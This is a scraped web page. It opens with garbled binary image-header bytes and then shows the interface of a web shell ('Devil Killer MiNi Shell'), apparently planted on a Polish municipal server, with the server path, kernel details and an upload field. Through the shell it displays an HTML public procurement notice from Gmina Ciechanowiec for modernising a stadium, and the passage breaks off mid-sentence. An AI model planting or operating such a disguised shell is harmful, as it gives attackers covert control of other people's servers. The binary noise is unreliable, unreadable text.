JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220711/0024836201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodarowanie terenu Ośrodka Sportu i Rekreacji nad Zalewem w Ciechanowcu wraz z modernizacją Stadionu Miejskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechanowiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450670150</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechanowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862771145</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862771066</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ciechanowiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ciechanowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie terenu Ośrodka Sportu i Rekreacji nad Zalewem w Ciechanowcu wraz z modernizacją Stadionu Miejskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b08386b-00fd-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00248362</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027057/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa Stadionu Miejskiego w Ciechanowcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.um.ciechanowiec.wrotapodlasia.pl/Zam_publiczne/2022/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPhttps://epuap.gov.pl/wps/portal oraz poczty elektronicznej: info@ciechanowiec.pl,<br/>sekretariat@ciechanowiec.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany,wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wnioski, zawiadomienia oraz informacje (zwanymi dalej ogólnie „korespondencją”) Zamawiający i<br/>Wykonawcy przekazują powołując się na numer ogłoszenia (BZP) lub numer referencyjny<br/>postępowania tj. RI.271.7.2022 lub nr Id postępowania z miniPortalu:<br/>3.1. za pośrednictwem dedykowanego formularza udostępnionego przez miniPortal (Formularz do<br/>komunikacji) lub dostępnego na ePUAP lub<br/>3.2. drogą elektroniczną na adres: info@ciechanowiec.pl, sekretariat@ciechanowiec.pl, przy czym<br/>sposób komunikacji wskazany w niniejszym podpunkcie nie jest właściwy dla oferty oraz dokumentów składanych wraz z ofertą (wymagających szyfrowania), które należy składać w sposób wskazany w ppkt 3. 1.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępny <br/>pod adresem https://miniportal.uzp.gov.pl/warunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB (dotyczy MiniPortalu oraz<br/>ePUAP).<br/>7. Niniejsze postępowanie jest prowadzone w języku polskim. Oferta oraz podmiotowe środki<br/>dowodowe muszą być składane w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO”),<br/>informujemy o zasadach przetwarzania Pani/Pana danych osobowych oraz o przysługujących<br/>Pani/Panu prawach z tym związanych.<br/>1. Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim w<br/>Ciechanowcu jest: Gmina Ciechanowiec, ul. Mickiewicza 1, 18 - 230 Ciechanowiec, reprezentowana<br/>przez Burmistrza Ciechanowca.<br/>2. W sprawie pytań dotyczących sposobu i zakresu przetwarzania Pani/Pana danych osobowych oraz<br/>przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony<br/>Danych Urzędu Miejskiego w Ciechanowcu – Wiśniewska Dorota, za pomocą adresu e-mail:<br/>iod@ciechanowiec.pl, lub tel. 86 277 11 45 w 35.<br/>3. Administrator danych osobowych – Gmina Ciechanowiec - przetwarza Pani/Pana dane osobowe (art.<br/>6 ust. 1 lit. c) i art. 9 ust. 1 i 2 lit. a), b) i g)RODO) w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pod nazwą: „Zagospodarowanie terenu Ośrodka Sportu i Rekreacji nad<br/>Zalewem w Ciechanowcu wraz z modernizacją Stadionu Miejskiego” prowadzonym w trybie<br/>podstawowym bez negocjacji.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o ustawę z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych, dalej zwaną „ustawa Pzp”.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z przepisami ustawy Prawo zamówień<br/>publicznych, względnie przez okres gwarancji/rękojmi wynikający z zawartej umowy albo 15 lat w<br/>przypadku<br/>zamówień współfinansowanych ze środków europejskich.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. W związku z przetwarzaniem Pani/Pana danych<br/>osobowych przysługują Pani/Panu następujące uprawnienia: prawo żądania dostępu do swoich danych<br/>osobowych (Administrator może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie zadania, w szczególności podania nazwy lub daty postępowania/daty zakończonego<br/>postępowania o udzielenia zamówienia publicznego), prawo żądania sprostowania danych osobowych, prawo żądania ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (prawo to nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego).<br/>2. W związku z przetwarzaniem Pani/Pana danych osobowych nie przysługuje Pani/Panu prawo do<br/>usunięcia danych osobowych (art. 17 ust. 3 lit. b), d) lub e) RODO), prawo do przenoszenia danych<br/>osobowych (art. 20 RODO), prawo<br/>sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust. 1 lit. c) RODO (art. 21 RODO).<br/>3. W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w Urzędzie Miejskim w<br/>Ciechanowcu Pani/Pana danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do<br/>organu nadzorczego właściwego w sprawach ochrony danych osobowych tj. Prezesa Urzędu Ochrony<br/>Danych Osobowych, adres: Stawki 2, 00-193 Warszawa.<br/>4. Administrator danych osobowych nie stosuje wobec Pani/Pana danych zautomatyzowanego<br/>podejmowania decyzji, w tym profilowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje przebudowę istniejącego stadionu miejskiego w miejscowości<br/>Ciechanowiec, gm. Ciechanowiec, w tym m. in.:<br/>- rozbiórkę istniejącej bieżni i urządzeń lekkoatletycznych wraz z podbudową;<br/>- rozbiórka istniejącej bieżni i urządzeń lekkoatletycznych wraz z podbudową;<br/>- rozbiórkę placu wielofunkcyjnego o nawierzchni betonowej wraz z podbudową;<br/>- rozbiórkę części ciągów pieszych wraz z podbudową;<br/>- rozbiórkę istniejących trybun;<br/>- rozbiórkę wyposażenia sportowego;<br/>- rozbudowę z przebudową i nadbudową budynku sanitarno-szatniowego<br/>- przebudowę i rozbudowę boiska do piłki nożnej o nawierzchni z trawy syntetycznej;<br/>- przebudowę i rozbudowę bieżni lekkoatletycznej okólnej 400 m oraz prostej sześciotorowej o<br/>dystansie 100 m o nawierzchni poliuretanowej;<br/>- budowę trybun wraz z zadaszeniem;<br/>- wykonanie zadaszeń dla zawodników rezerwowych i trenerów,<br/>- wykonanie nowych piłkochwytów o wysokości 8 m;<br/>- wykonanie ogrodzenia płyty boiska, trybun, całego terenu sportowego wraz z bramą wjazdową;<br/>- wykonanie automatycznej instalacji nawadniającej płytę boiska oraz instalacji odwadniającej<br/>teren;<br/>- wykonanie oświetlenia boiska sportowego;<br/>- wykonanie kanalizacji kablowej pod nagłośnienie obiektu;<br/>- wykonanie kanalizacji kablowej pod monitoring;<br/>- wykonanie niezbędnych skarp i murów oporowych z elementów prefabrykowanych;<br/>- budowę ciągów komunikacyjnych oraz schodów terenowych;<br/>- montaż małej architektury;<br/>- usunięcie/przebudowę istniejących oraz budowę nowych instalacji zewnętrznych,<br/>wewnętrznych<br/>oraz przyłączy: wodnego, kanalizacyjnego, elektroenergetycznego.<br/>Szczegółowy zakres robót obejmujących zadanie został określony w załączonej do<br/>postępowania dokumentacji technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy (ON), który<br/>spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów<br/>stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną<br/>zgodniez poniższym wzorem:<br/>Oferta najkorzystniejsza (ON) = (C) + (G), gdzie: C - liczba punktów przyznana ofercie ocenianej w<br/>kryterium „Cena”, G - liczba punktów przyznana ofercie ocenianej w kryterium„Okres gwarancji i<br/>rękojmi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania oraz spełniają określone w art. 112 ust. 2 przez zamawiającego warunki udziału<br/>w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania oraz spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa szczegółowych wymagań w ww. zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa szczegółowych wymagań w ww. zakresie.<br/>3) Sytuacji ekonomicznej i finansowej:<br/>Zamawiający nie określa szczegółowych wymagań w ww. zakresie.<br/>4) Zdolności technicznej lub zawodowej:<br/>a) doświadczenie Wykonawcy:<br/>W zakresie spełnienia warunku, wymagane jest: wykazanie w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie wykonał, jedną robotę budowlaną polegającą na budowie, przebudowie lub rozbudowie<br/>stadionu o wartości, co najmniej 3.500.000,00 zł brutto (słownie: trzy miliony pięćset tysięcy<br/>złotych 00/100), wraz z podaniem rodzaju i wartości, daty i miejsca wykonania i podmiotów na<br/>rzecz, których robota ta została wykonana, z załączeniem dowodów określających, czy ta robota<br/>budowlana została wykonana należycie, w szczególności informacji o tym czy robota została<br/>wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego roboty budowlane były wykonane sporządzone według wzoru stanowiącego<br/>Załącznik nr 2 do SWZ - Oświadczenie o wykonywanych robotach budowlanych (W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia dokumenty w/w<br/>powinien przedłożyć ten lub ci Wykonawcy, którzy potwierdzają spełnienie warunku).<br/>b) będzie dysponował osobami, które będą uczestniczyć w wykonywaniu przedmiotu<br/>zamówienia, w szczególności:<br/>- kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjnobudowlanej<br/>uprawniające do kierowania robotami budowlanymi w zakresie przedmiotowego<br/>zamówienia albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie funkcji<br/>kierownika budowy w zakresie niniejszego zamówienia, o doświadczeniu zawodowym<br/>polegającym na pełnieniu funkcji kierownika budowy lub robót w ramach posiadanej<br/>specjalności na co najmniej jednej robocie budowlanej polegającej na budowie, przebudowie lub<br/>rozbudowie stadionu,<br/>- kierownikiem robót instalacyjnych posiadającym uprawnienia budowlane do kierowania<br/>robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych albo odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, o doświadczeniu zawodowym polegającym na pełnieniu funkcji kierownika budowy<br/>lub robót w branży instalacyjnej na co najmniej jednej robocie budowlanej polegającej na<br/>budowie, przebudowie lub rozbudowie stadionu,<br/>- kierownikiem robót elektrycznych posiadającym uprawnienia budowlane do<br/>kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji<br/>urządzeń elektrycznych i elektroenergetycznych albo odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, o<br/>doświadczeniu zawodowym polegającym na pełnieniu funkcji kierownika budowy lub robót w<br/>branży elektrycznej na co najmniej jednej robocie budowlanej polegającej na budowie,<br/>przebudowie lub rozbudowie stadionu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia niepodleganiu wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/> a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 ustawy Pzp i art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca<br/>składa:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi 